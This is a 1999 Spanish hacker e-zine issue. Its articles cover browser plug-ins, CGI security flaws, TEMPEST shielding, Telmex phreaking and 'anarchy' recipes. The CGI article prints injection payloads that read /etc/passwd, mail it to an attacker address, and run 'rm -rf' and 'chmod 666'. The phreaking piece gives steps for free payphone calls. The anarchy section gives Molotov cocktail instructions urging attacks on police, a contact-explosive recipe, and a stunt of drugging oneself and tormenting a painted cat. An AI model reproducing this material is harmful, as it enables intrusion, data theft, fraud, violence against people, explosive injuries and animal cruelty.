RareGaZz nº6:(RARE006.TXT):12/12/1999 << Back To RareGaZz nº 6
─────────────────────╥──────────────────────────────────────────────────────── <<::RareGaZz::>> ║ Primer año, numero seis. "Vive Le RareGaZz" ║ hacking/phreaking/anarchy/virii/warez/cracking ─────────────────────╫──────────────────────────────────────────────────────── Revista electronica ║ gratuita creada con ║ Hola a todos esperamos disfruten este numero de la fines educativos ║ revista y esperamos sigan enviando sus comments' exclusivamente.Toda ║ En este numero nos falto la colaboracion de dos amigos la informacion de ║ por todos ustedes conocidos (Mr.X, LePompeItor) en la esta revista esta ║ edicion de esta revista pero a pesar de sus examenes amparada bajo el ║ finales uno de ellos nos mando un texto para no quedar concepto de la ║ mal con todas las personas que lo han apoyado. libre expresion. ║ ║ Este paquete viene repleto de informacion bastante Editorial: ║ util como la informacion sobre los Bugs de Microsoft ║ que nos mando duvahazard, notas sobre los virus de -RareTrip ║ parte de un aficionado de ellos de nombre Orion y los -KillerBot ║ dos textos de otro excelente colaborador Truco. ║ Colaboradores: ║ Hace poco salio del Underground InterHak Beta con ║ acceso gratuito en 3 ciudades de la republica por el -CrackSmoker ║ momento y hasta la fecha solo ha sido distribuido a los -DuvaHazard ║ chicos favoritos de raregazz. Si aun no tienes una -Orion ║ copia de interhak busca el link para bajarlo en alguna -Truco ║ parte de esta revista :-) -Mr. X ║ ║ @@@@@@--> RAREGAZZ@BIGFOOT.COM <--@@@@@@@ ─────────────────────╨──────────────────────────────────────────────────────── ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ooo oo $$$o ooo $$$$ $$$o $$$" $$$$ o "$$$ $$$" o$$$ oo 1.- La guerra de los Plug-Ins $$$oo $$$$ $$$" $$$" o$$$$ 2.- Fallas de seguridad con CGI oo ""$$$o "" oooooo ""o$$$$" oo 3.- Tempest - La nueva amenaza. o$$$$$ooo "$"oo$$$$$$$$$$o "$" oo$$$$$ 5.- FR3GANDO A 73LM3X-primer parte- ""$$$$$$o o$$$""" ""$$$$o o$$$$$""" 6.- Anarquia con elegancia """ o$$$" "$$$o """ 7.- Los Bugientos de Microsoft o$o$$o$ o$$$ RareGaZz $$$ o$o$o$o 8.- El fenomeno virus $$$$$$ o$$$ ~~~~~~~~ $$$ "$$$$$$" 7.- Ingenieria Social ooo $$$$ o$$$" oo 9.- Hackeando BBS's ooo$$$$$o $$$$o oo$$$" $$$$$$oo 10.- Como cubrir tus huellas 2/2 "$$$$$""" oo "$$$$$$$$$$$""ooo"""$$$$$$ 11.- Que hay de malo con <FONT> ? """ o$$$$ o """""""" o"$$$oo """ 12.- El padre de todos los virus 2/2 $$$$" o$$$ oo$o $$$ "$$$o 13.- Boomerang! "" $$$" "$$$ "$$$ "" 14.- NotiLOONS $$$" "$$o $$$$ $$$" "$"" $$$o "El EZLN no existe" 1/15/1992 ""$ $"" "El EPR no existe" 11/6/1996 "El RdK no existe" 6/18/1997 -Gobierno Mexicano ¿ Que nos enseña la historia ? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ──────────────────────────────────────────── ─────────────────────────── "La guerra de los Plug-Ins"───────────── por───────────────────────── KillerBot────────────────────── Has notado un nuevo tipo de espera en linea cuando haces click en algun link? has tenido que esperar que la grase resbale a travez de tu modem amontonando el colesterol en el cache de tu disco a punto de un ataque cardiaco? Tal vez estes sufriendo de sobre-peso en tu navegador. El sobre-peso de tu navegador se crea cuando en tus viajes por la red bajas e instalas muchos plug-ins en tu sistema. Mientras mas y mas web-sites incluyen animaciones y truquitos -como Quicktime VR, Quicktime movies, Real Audio, Real Video, Shockwave, Chat plugins- existen menos procesamientos que tu navegador puede hacer por si solo, asi, surfear se vuelve mas complejo. Cuando un plug-in en particular es necesario para obtener el impacto multimedia de un website, tu surfeo se detendra y dos cosas pueden pasar: 1) Si ya bajaste e instalaste el plug-in necesario, tendras que esperar a que la mentada animacion se copie a tu disco duro, donde es guardada en el cache de tu navegador y ejecutada. 2) Si aun no tienes el plug-in necesario tendras que conseguirlo (esto a veces requiere dirigirte a otro website) y despues esperar a que el plugin se copie a tu maquina. No es inusual que el tamaño de estos plugins sea de varios megabytes lo que puede hacerte gastar tiempo en linea. Y, a pesar de que los applets Java pueden no añadirse a la celulitis de tu PC, ellos tambien pueden tapar las arterias de tu modem con una sopa espesa de downloads. Recuerda, una vez que hayas instalado un plug-in en tu sistema, trabajara para todos los sitios que usen la misma tecnologia plugin. A menos que no quieras perderte ninguna campana o chiflido de la red mundial (y algunos son algo elaborados), entonces considera solo cargar los plugins mas populares. ¿ Por que existen los Plug-Ins ? Una de las razones por las que el surfeador de hoy se enfrenta con toneladas de plugins es la poliza abierta de desarrollo del navegador Netscape, que escencialmente permite que cualquiera desarrolle sus propios suplementos multimedia para aumentar la experiencia de navegar. Lo gracioso de todo esto es, que cada uno de los navegadores solos -usando nada mas que su codigo HTML- pueden crear rapidas, divertidas y firmes paginas web satisfactorias. De hecho, antes de inyectar otro plugin a la corriente sanguinea de tu navegador, toma tiempo analizando algunos de los efectos que puedes disfrutar libre de grasa. ¿ Como poner a dieta a un Browser ? Si te decides a poner en regimen alimenticio a tu browser, debes separar los plug-ins lowfat de los waffles. Como hacerlo? Simplemente tienes que hacerte las siguientes preguntas: 1.- Cuales son mis usos para Internet? Si buscar informacion (o hackear) es tu principal prioridad, no necesitaras shockwave o quicktime por ejemplo. Pero estos son los mas necesarios y populares si tu quieres disfrutar de un buen show en Internet. Y si te gusta un poco de musica de fondo o escuchar alguna de las estaciones de radio de internet, entonces debes considerar Real Audio 4.0 que es la mas actual. 2.- Cual es la velocidad de mi modem y cuanto tiempo estoy dispuesto a esperar para ver una pagina? Algo menor que 28.8kpbs puede darle un paro cardiaco a tu modem y mandar tu navegador a un descanso eterno. 3.- Que sitios visito regularmente? Y tienen plug-ins en comun? Recuerda que una vez el plug-ins este en las venas de tu navegador, servira para todos los sitios que lo necesiten. La belleza original de los navegadores es que todos podemos usarlos con facilidad. Es como un carro modelo deportivo recien comprado, lo aceleramos, frenamos y manejamos sin tener que meternos con el motor. Desafortunadamente cada vez mas sitios nos fuerzan a abrir el motor a nuestro deportivo e insertarle algunos nuevos componentes que pueden afectar su funcionamiento. Ademas tenemos que actuar como mecanicos especializados para instalarlos y en otros casos, removerlos. Algunas definiciones: Plug-In: Tu puedes expandir la capacidad de tu navegador inyectando varias herramientas que te permitiran ver (y oir) ciertas cosas, como archivos de audio o video. Java: Simplemente es un lenguaje de programacion usado para crear miniprogramas (conocidos como "applets"), que son automaticamente bajados cuando te encuentras un sitio "Java enhanced". La compañia que lo desarrollo es Sun Microsystems, y es usado en muchos juegos y chats en linea y para animar imagenes. Puedes bajar un sencillo programa para hacer Applets en la direccion www.macromedia.com El programa se llama Applet Ace y es gratuito. Animacion GIF: La mayoria de las graficas quietas que ves en linea son GIFs. La ultima version de esas graficas (version 89a) permite crear simples animaciones cuadro por cuadro. GIF significa "Graphics Interchange Format". Real Audio: Alguna vez has hecho click en algun archivo de audio y esperado horas para escucharlo? Real Audio por Progressive Networks, es un formato de audio especial que empieza a tocar el sonido tan solo segundos despues de que empiezas a hacer el downloading. Una vez que hayas bajado el plug-in, necesitaras otro momento para correr al baño ;) Shockwave: Mas y mas sitios web dicen estar "shocked". No, no has ofendido a nadie de alguna manera; quiere decir que ese sitio necesita una utilidad llamada shockwave creada por Macromedia. Shockwave permite incorporar animaciones graficas y sonidos en linea. Espero esto haya sido util de alguna manera y hasta la proxima! Original para RareGaZz ~~~~~~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Fallas de seguridad con CGI por Gregory Gilliss Common Gateway Interface (CGI) es una interfaz que permite la comunicacion entre programas cliente y la informacion de un servidor que comprende el protocolo de transmision de texto (HTTP). TCP/IP es el protocolo de comunicacion usado por el script CGI y el servidor durante las comunicaciones. El puerto default para las comunicaciones es el puerto 80 (privilegiado) pero otros puertos no privilegiados pueden ser especificados. Los scripts CGI pueden realizar procesos relativamente simples del lado del cliente. Un script CGI puede servir para dar formato a el lenguaje HTML, crear documentos HTML dinamicos y generar imagenes graficas dinamicas. CGI tambien puede realizar entradas y salidas de informacion. CGI guarda la informacion en variables del sistema que son accesadas por medio del script. Los scripts CGI tambien pueden aceptar parametros en la linea de comando. Los scripts CGI operan en dos modos basicos: - En el primer modo, el script CGI hace un procesamiento de datos basado en la entrada (input) que se le indica. Un claro ejemplo es el procesamiento de informacion para corregir la sintax que actualmente esta usando hotmail. - El segundo modo es cuando el script CGI actua como conducto de informacion entre el cliente al servidor y de vuelta al cliente. Como ejemplo, un script CGI puede ser usado como el frente de una base de datos corriendo en el servidor. Los scripts CGI pueden ser escritos usando lenguajes compilados, lenguajes de programacion interpretados o lenguajes de scripts (scripting). La unica ventaja que existe entre una u otra forma de crear scripts CGI es la velocidad de ejecucion. El set de metodos disponibles para los programas CGI estan definidas en las especificaciones HTTP 1.0. Los tres metodos pertinentes a esta discusion son el metodo 'Get', el metodo 'Post', y el metodo 'Put', El metodo 'Get' consigue informacion del cliente al servidor. El metodo 'Post' pregunta al servidor si acepta la informacion pasada del cliente como una especificacion del objetivo. El metodo 'Put' pregunta al servidor si acepta la informacion como reemplazo del objetivo. Vulnerabilidades Las vulnerabilidades causadas por el uso de los scripts CGI no son debilidades de CGI, son errores en las especificaciones HTTP y en varios programas del sistema. CGI simplemente permite el acceso a esas debilidades. Hay otras maneras de explotar la seguridad de un sistema. Por ejemplo, las restricciones al acceso de archivos pueden ser explotadas usando FTP o telnet. CGI lo unico que hace es ofrecer mas oportunidades para explotar estas y otras fallas en la seguridad de un sistema. CGI permite la lectura de archivos, adquirir acceso shell y corromper archivos en las maquinas servidoras y sus hosts. Metodos para ganar acceso pueden ser: explotando los defaults del script, explotando debilidades en el ambiente del servidor, y explotando debilidades en otros programas y llamadas al sistema. La principal debilidad de los scripts es insuficiente validacion de las entradas del usuario. De acuerdo con las especificaciones de HTTP 1.0, los datos pasados a un script CGI deben ser codificados para que puedan trabajar en cualquier hardware o software. Los datos pasados a un script CGI usando el metodo Get son incluidos al final del Universal Resource Locator (URL). Esta informacion puede ser obtenida por los scripts CGI como una variable de ambiente llamada QUERY_STRING. Los datos son pasados como tokens en la forma de variable=valor, con los tokens separados por &. Las & y otros caracteres alfanumericos deben ser codificados como valores hexadecimales. Los caracteres hexadecimales son seguidos por un signo % en la URL. Es la responsabilidad del script CGI remover caracteres en la entrada del usuario. Los simbolos como < y >, son delimitadores de HTML tags y son usualmente removidos con una simple operacion como la siguiente: Ejemplo de un script con PERL ----------------8<---------------------------------------------------------- # Procesar variables de entrada {$NAME, $VALUE) = split(/=/, $_); # split up each variable=value pair $VALUE =~ s/\+/ /g; # Replace '+' with ' ' $VALUE =~ s/%([0-9|A-F]{2})/pack(C,hex,{$1}}/eg; # Replace %xx characters with ASCII # Escape metacharacters $VALUE =~ s/([;<>\*\|'&\$!#\(\)\[\]\{\}:"])/\\$1/g;# remove unwanted special characters $MYDATA[$NAME} = $VALUE; # Assign the value to the associative array ----------------8<---------------------------------------------------------- Este ejemplo remueve los caracteres especiales como el semi-colon que es interpretado por el shell como un separador de comandos. La inclusion de un semi-colon en la entrada permite la posibilidad de ejecutar comandos adicionales en la entrada del usuario. El ejemplo anterior esta incompleto ya que no remueve la posibilidad de un caracter de nueva linea '%0a', que puede ser usado para ejecutar otros comandos que no son parte del script. De esta forma, podemos ejecutar otros comandos de los que el script nos permite. Por ejemplo, la siguiente URL pide una copia del archivo /etc/passwd del servidor: http://www.un-servidor.com.mx/cgi-bin/query?%0a/bin/cat%20/etc/passwd '%0a' es un enter '%20' un espacio en blanco La parte principal de un programa CGI es un documento HTML llamado Form. Los forms incluyen el tag <INPUT>. Cada <INPUT> tiene una nombre llamado variable asociado con el. Esta es la variable que forma el lado izquierdo de lo que previamente se habia mencionado variable=valor. Los contenidos de las variables del Form forman el valor del token. Los scripts CGI deben realizar el filtrado de los contenidos del campo <INPUT>. Si los scripts CGI fallan al filtrar las entradas del usuario, una situacion como el previo ejemplo podria originarse. Otra tag HTML que en ocasiones se ve en las forms es <SELECT>. Este tag permite a un usuario del lado cliente elegir de unas opciones predeterminadas. La eleccion se vuelve la derecha del token variable=valor pasado al script CGI. Los scripts CGI seguido fallan al validar la entrada de un campo <SELECT> asumiendo que el campo contendra datos predeterminados. De nuevo, estos datos son pasados directamente al programa interpretador de lenguajes. Programas compilados que no realizen validacion de los caracteres pueden ser vulnerables. Un script shell o PERL que invoque el programa de correo de UNIX puede ser vulnerable a un escape del shell. Mail acepta comandos en la siguiente forma "~!commando" y forja un shell que ejecute el comando. Si el script CGI no filtra la sequencia "~!", el sistema es vulnerable. Los agujeros de sendmail pueden ser explotados de esta manera. De nuevo, la llave consiste en encontrar scripts que no filtren los caracteres de entrada. Si puedes encontrar un script CGI que contenga una llamada a UNIX system() con solo un argumento, entonces has encontrado una puerta al sistema. Cuando la funcion system() es invocada con un solo argumento, el sistema forja un shell por separado para manejar la peticion. Cuando esto pasa, es posible añadir datos a la entrada y generar resultados no esperados. Por ejemplo, un script PERL que contenga lo siguiente: system("/usr/bin/sendmail -t %s < %s", $mailto_address < $input_file"); esta diseñado para enviar por correo una copia de $input_file a la direccion especificada por la variable $mailto_address. Si copiamos y modificamos la entrada para el form de la siguiente manera: <INPUT TYPE="HIDDEN" NAME="mailto_address" VALUE="direccion@servidor.com;mail cracker@hacker.com </etc/passwd"> podemos explotar al sistema y obtener el passwd del servidor por email. La funcion system() no es el unico comando que forja un nuevo shell. La funcion exec() con solo un argumento tambien hace lo mismo. Abrir un archivo y redireccionar el resultado tambien crea un shell separado. En PERL la funcion: open(FILE, "| program_name $ARGS"); abrira FILE y pasara los resultados a program_name que se ejecutara como un shell separado. En PERL, el comando eval ejecuta cualquier argumento que sea pasado a el. Los scripts CGI que pasan la entrada del usuario a el comando eval pueden ser usados para ejecutar cualquier cosa que el usuario desee. Por ejemplo: $_ = $VALUE; s/"/\\"/g # Escape double quotes $RESULT = eval qq/"$_"/; # evaluate the correctly quoted input este script pasa los datos de $VALUE a eval escencialmente no modificados, excepto por asegurarse que las doble " no confundan al interprete. Si $VALUE contiene "rm -rf *", los resultados serian desastrosos. Copiar, modificar y reemplazar el archivo de librerias "cgi-lib" permitira a los usuarios a executar comandos o rutinas dentro del archivo de librerias. El ejemplo del comando eval permite la ejecucion de: $_ = "chmod 666 \/etc\/passwd" $RESULT = eval qq/"$_"/; este comando permitiria escribir al passwd a todo el mundo. Conclusion El uso impropio de los scripts CGI permite a los usuarios un numero ilimitado de debilidades del sistema. Fallar al validar las entradas de un usuario, funciones de llamadas al sistema pobremente planeadas e insuficientes restricciones a los archivos pueden ser explotadas a travez del mal uso de CGI. * Adaptado de Mudry, R. J., ** Adaptado de Phillips, P., Safe CGI Programming, =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ╔══════════════════╗ ║ ║ ║ * TEMPEST * ║ ║ la nueva amenaza ║ ║ ~~~~~~~~~~~~~~~~ ║ ╚══════════════════╝ TEMPEST es el nombre clave para la tecnologia relacionada con las emisiones electromagneticas no deseadas del equipo de proceso de datos. La meta de este texto es reducir la capacidad del oponente de capturar la informacion que fluye por el equipo de computo. La mayoria de la informacion que comprende las especificaciones TEMPEST esta clasificada por el gobierno de los estados unidos americanos y no esta disponible para el uso de los ciudadanos. El espectro electromagnetico producido por los componentes de una computadora para "hablar" entre ellos y sus velocidades (megahertz) producen un rico set de señales en una ancha parte del espectro electromagnetico. Debido a que las emisiones ocupan una amplia parte del espectro, existen formas para bloquear esas emisiones (como cerrar las cortinas para bloquear la parte visible de la luz) y no son necesariamente efectivas en otras porciones (rayos uv, etc). Las emisiones de un sistema de computo pueden ser capturadas y procesadas para revelar informacion de los sistemas desde simples niveles de actividad (on/off) hasta capturar las teclas presionadas en un teclado o capturar toda la informacion del monitor. Se sabe que los sistemas poco protegidos pueden ser monitoreados efectivamente desde una distancia de 1 kilometro. Este texto tratara de explicar algunas formas en que puedes reducir las posibilidades de ser monitoreado usando tecnicas sencillas. Una forma de ver la tecnologia TEMPEST desde un punto de vista simple es tratar de comparar el problema de la interferencia de un radio frente a una señal de television y prevenir esa interferencia tratando de evitar la emision de señales electromagneticas del radio. Viendo el problema desde esta luz, veras que existen bastantes documentos para evitar la interferencia de los aparatos electricos. Cada manual de television o radio contiene informacion para prevenir ese problema que es virtualmente identico al problema de la tecnologia TEMPEST. Reducir totalmente las emisiones electromagneticas es casi imposible para la persona comun. El objetivo debe ser reducir las emisiones por un corto periodo de tiempo por ejemplo, hasta que la van estacionada frente a tu casa se retire. Los departamentos contiguos tienen que adoptar tecnicas mas avanzadas para evitar el espionaje debido a la corta distancia en que pudiera colocarse una persona con el objetivo de capturar informacion de nuestro equipo de computo. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Un buen principio para evitar este tipo de 'espionaje' seria eligir equipo con las emisiones mas bajas de ondas. Este tipo de equipo esta catalogado como "clase B". Todos tus perifericos y equipo deben cumplir con este standard norteamericano lo que garantiza que solo escaparan una de diez emisiones a comparacion de la "clase A". Una vez conseguido este tipo de equipo, hay que seguir las recomendaciones del fabricante para preservar la integridad del blindaje. Una de estas recomendaciones es el no operar el equipo de computo con uno o mas slots de la parte trasera de la computadora abiertos. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Usa cable protegido para todas las conexiones. Este tipo de cable esta sobrepuesto a los cables con una lamina de metal o aluminio para mantener las señales pegadas al cable. Ya no es comun usar cable de tela para conectar a la computadora, digamos, un floppy drive. El cable sin proteccion trabaja como una antena para las señales generadas por la computadora y sus perifericos. Trata de evitar muchos cables amontonados en la parte trasera de tu computadora y mantenlos lo mas cortos posible. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Bloquea la informacion transmitida por tu fax/modem o linea telefonica. Las lineas telefonicas generalmente estan poco protegidas y la emision de tu computadora puede usar la linea telefonica como antena asi como tambien puede hacerlo el tipico monitor de tubos de rayos catodicos "CRT". Manten tu linea telefonica retirada de las tomas de corriente y perifericos de tu computadora asi como de la parte trasera del monitor. Esto es en contra de la costumbre de mantener siempre una linea telefonica cerca del equipo de computo como se acostumbra recomendar en todos los manuales de computadoras por razones hasta ahora desconocidas ;) _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Pregunta en tu tienda de electronica por imanes que eviten la emision del campo electromagnetico, puedes decir que tu computadora interfiere con la señal de television e inmediatamente te conseguiran todo tipo de supresores de señales. Recuerda proteger principalmente las lineas telefonicas o el cable de corriente que no tenga proteccion a parte del plastico que rodea el cobre. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ En caso de interferencia de tu equipo con lineas electricas o con un componente como el radio o television, puedes construir una caja de Faraday de aluminio del tipo que hay en casi todas las cocinas. Una buena caja debe cubrir todos los perifericos incluyendo el cable del teclado, monitor y modem. Una caja de este tipo tiene un alto nivel de exito al reducir las emisiones drasticamente pero recuerda mantener la corriente de aire al equipo. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Para revisar si tienes un equipo relativamente seguro, lo puedes hacer con un radio AM portable. Colocalo cerca del cuerpo de la computadora y todos sus cables. Idealmente, no debes escuchar aumento de estatica en la señal. Si escuchas un aumento de estatica en ciertas partes de la computadora unicamente (como cables) es necesario bloquear las emisiones de ese lugar con uno de los metodos descritos. Para que tengas una idea de las emisiones electromagneticas de tu computadora una simple brujula es todo lo que necesitas. Si la aguja se mueve cuando la pones cerca de un componente puedes apreciar que tanta emision de ondas tu equipo esta soltando. Hay otras formas de proteger el equipo electrico pero estas son las mas comunes. Una compañia o sistema que necesite seguridad de primera prioridad necesita estar protegido para ataques de cualquier tipo. Hoy en dia es mas facil conseguir aparatos que reciban estas ondas por lo que un intruso puede obtener passwords, numeros de cuentas y mucha mas informacion con simplemente estacionarse cerca del objetivo. [ Adaptacion de "Tempest in a Teapot" de CDC ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ************************************************************************* *************************** FR3GANDO A 73LM3X Parte 1 ************ ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Original de Carlos Truco ooooooooo oo$$$"""""""$$$$o Pues bien, hoy conoceran algunos de los o$$"" oooooo ""$$o secretos que encierra nuestra maravillosa o$$" $$$ $$$$$ "$$o compañia telefonica: TELMEX. Intentare o$" $$$ $$$$$o "$o dar un pequeño curso en 10 o 12 numeros o$" """ "$$$$ "$$ de la revista sobre la infinidad de o$$ $$$$ $$o posibilidades de hacer phreaking en Mexico. $$ $$$$ $$ $$ $$$$ $$ Notas: $$ $$$$ $$ No lo hare por venganza contra las famosas $$o $$$$ o$$ Southwestern Bell ni France Telecom que $$ o$$$" $$ deciden sobre nuestros telefonos. Tampoco $$ o$$ $$$$$ $$ lo hare por el mediocre servicio de Telmex, $$o $$$ $$$$$" o$$ ni sus constantes interrupciones al ocupar "$$o $$$ $$$$" o$$" Lada, ni por su extraordinario servicio ""$$ooo"" "" ooo$$"" tercermundista de apenas 10 lineas por ""$$$$$$$$$"" habitante. Lo hare por ser una de las cien empresas mas importantes del planeta y que ella se encuentre en manos ajenas, lo hare por aumentar tu conocimento acerca de como es y como funciona un telefono. Ya fue definido lo que es un phreaker, la teoria acerca de las boxes, y algunas otras cosas acerca de este maravilloso arte. Sin embargo hoy no te explicare como hacer buenos montajes, u otras maravillas con el telefono. Hoy solo te dire como hacer una llamada local gratis, desde un mugre telefono publico. Eso es lo que voy a hacer. Hoy ya no quiero decirte mas. Para eso estara el siguiente numero. Si quieres hacer una llamada local gratis hoy tendras que buscar una cabina TELMEX con las siguientes caracteristicas: - El telefono que busques no debera de ser de tarjeta. (No es mi culpa que no encuentres uno de estos, ya te explicare el truco para los de tarjeta en la parte 2) - Tendras que encontrar una cabina gris digital (esas de display pequeño) para realizar este truco. Ademas esta tendra que ser especial: Debera estar por TONOS. Si no sabes que significa por TONOS, estas frito carnal. Seguro tendras algo mejor que hacer. Sinceramente no se cuantas cabinas de este tipo existan en una ciudad de tamaño mediano. Considerando el numero de lineas por habitante, y que TELMEX se renueva por las de tarjeta seran unas cuantas. Sin embargo te podras quedar por lo menos 25 minutos hablando sin pagar. En una ciudad como Morelia o Guanajuato ahora que fui de vacaciones encontre varias en los centros comerciales. Asi que no creo que sea muy dificil encontrar por lo menos una para tus propositos. Nota: Considerando que no he probado el truco en toda la Repub. Mexicana, es viable que no sirva en algunos lugares, debido a que tiene ciertas limitantes, que explico mas adelante. En fin ya que la hayas encontrado deberas hacer lo siguiente: Paso 1 - Marca 9580, y espera. Recibiras un tono de ocupado. Espera unos segundos a que el tono de ocupado se haga mas rapido. En eso momento continua con el paso 2. Paso 2 - Marca ahora un 0. Y espera a que el tono de ocupado se vuelva a hacer mas rapido. Paso 3 - Marca otro 0, y tendras el tono de marcar. Paso 4 - Ahora llama al telefono que desees, no hay cobro por ello. Limitantes : Este truco no sirve para ciudades con numeros de telefono muy grandes (por ejemplo el DF, eso creo), o para numeros de larga distancia ya que se te acaba el display digital. Si quieres hacer el truco en esas condiciones tendras que hacer lo siguiente: Graba los tonos producidos por el telefono (los beeps y demas que hace cuando marcas un determinado numero) en un walkman. Asi si quieres marcar una larga distancia por ejemplo: 9 1 - ( 8 ) 3 1 - 3 3 7 consigue esos tonos en un cassete, y reproducelos en el auricular del telefono publico. Claro esta que te puedes conseguir algun programa de phreaking y facilitarte el trabajo, con una mejor calidad de sonido. Ese sera tu problema no el mio. En fin si te quieres arriesgar a hacerlo de esa forma ya es tu bronca. Existen otras formas mas sencillas que no requieren de esto, para las largas distancias. Otra limitante: Alguien te puede ver con el walkman y vales carnal... iran con algun judas y te quitara el walkman y terminaras en barandilla, te lo advierto. Esto no es el gabacho carnal. Mas sobre TELMEX en el proximo numero. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oooooo ┌────────────────────────────┐ o$$$$$$$$$$o │ Anarquia con Elegancia │ $$$$$$$$$$$$$$ │ por │ $$$$$$$$$$$$$$$o │ Mr. X │ "$$$""$$$$""$$$" └────────────────────────────┘ $$$ X $$ X $$$ <<::RareGaZz::>> $$oo$$$ooo$$ "$$$$ $$$$" El editor de raregazz, o cualquiera o"$$$$"o de sus colaboradores no se hacen "$o o$ responsables de los daños mentales, ooo $$$" oo fisicos o religiosos que puedan resultar $$$o $$$$ de seguir los consejos aqui descritos. $$$$$$$$oo oo$$$$$$$$ Este texto es presentado a ustedes con ""$$$$"" fines educativos unicamente :-) o$$$""$$oo ooo$$$" $$$$ooo $$$$$$ $$$$$$ El Gato Funky! """ "" ~~~~~~~~~~~~~~ Materiales necesarios: ====================== - Sustancia halucinogena (preferentemente LSD-25 o derivado) - Un gato - Gran cantidad de cera para pisos (industrial o casera) - Luz blanca tipo rave (camara lenta) - Bolas pequeñas o juguetes de gato - Pintura fosforecente (varios colores - que brille mucho) Instrucciones: ============== - Colocate en una parte de tu casa grande con piso de vinyl o madera. (los pisos alfombrados no funcionaran) - Encera el piso con *bastante* cera y trata de lograr una superficie muy resbalosa. - Cubre el area con objetos cortantes (opcional y no aprobado por la sociedad protectora de animales) - Remueve todas las fuentes de luz, cubre ventanas, etc. - Pon la luz en una posicion alta para que ilumine toda el area encerada. - Aplica la pintura al gato hasta producir un efecto -en caso de varios colores- bastante hippie. - Deja que el gato se seque. - Toma el LSD mientras esperas que el gato se seque. Una vez que estes suficientemente bajo las influencias del acido, prende la luz blanca de camara lenta al nivel de pulso deseado y avienta el psychodeliko gato al centro del piso (asegurate de ponerle un collar con un liston en caso de que alcance a salir de la superficie encerada)... El espectaculo causara un viaje estrepitoso a tus neuronas y bastante frustracion al gato... juega con el gato aventandole pelotas o su juguete preferido, etc... El ambiente puede ser mejorado incluyendo musica con un volumen alto o algun record con efectos especiales. Esto puede ser hecho por 2 personas incluyendo obviamente otro hit de acido (que sera tomado por la otra persona). ¡¡ Cuidado: En el caso de incluir tachuelas en el piso encerado, los gritos del gato pueden ocasionar un *MAL VIAJE* e impedir tu regreso a tierra !! COCKTAIL MOLOTOV ~~~~~~~~~~~~~~~~ Materiales: =========== -Gasolina -Aceite de carro -Trapos (pequeños pedazos) -Botella de vidrio tamaño standard (refresco) Instrucciones: ============== Cuando tengas la botella completamente limpia rellena la mitad del recipiente con gasolina y la otra mitad de aceite. Pon un trapo mojado con gasolina bien apretado en la boquilla (culo) que deje salir un buen cacho de trapo. Prendele fuego al trapo y con todas tus ganas proyecta esa botella a tu cuerpo policiaco favorito (preferentemente militares). Explosivo de Contacto ~~~~~~~~~~~~~~~~~~~~~ Materiales (disponibles en cualquier botica) ============================================ - Cristales de yodo solido (deben ser cristales solidos!) - Frasco de vidrio - Amoniaco Puro - Papel filtro (1 pieza) Preparacion: ============ 1. Coloca el yodo en el frasco. 2. Introduce suficiente amoniaco como para cubrir el yodo. 3. Deja reposar de una hora y media. 4. Filtra la solucion con el papel filtro. 5. Los cristales que quedaran en el filtro son EXPLOSIVOS! 6. Deja secar los cristales. [ 8 dias despues Mr.X me envia el siguiente texto ] Como se que muchos de ustedes al igual que yo seran lo suficientemente curiosos como para intentar crear el explosivo de contacto, quiero contarles el accidente que tuve en mi casa mientras seguia mi propia receta. Espero aprendan de mi error todos aquellos que les interese hacer este tipo de explosivos. Ayer fui a una Botica y pedi 1 gramo de cristales de yodo. Me dieron un frasco con la etiqueta "yodo metalico" y eran bolas de yodo (casi polvo). Consegui el Amoniaco puro ahi mismo y rapidamente fui a la casa para probar mi experimento. Mezcle en un recipiente metalico delgado y profundo, el gramo de yodo con el suficiente amoniaco para cubrir totalmente el yodo. Paso una hora y el yodo parecia hacerse una roca color metal. En hora y media coloque el papel filtro que compre tambien en la botica en la boca de un frasco y filtre el amoniaco. La mayoria del yodo lo tuve que sacar ayudado de un lapiz y lo puse sobre el filtro a secarse. Lo curioso fue que algunas gotas de yodo cayeron sobre la alfombra y cuando pasaba por ahi caminando hacian una pequeñisima explosion. 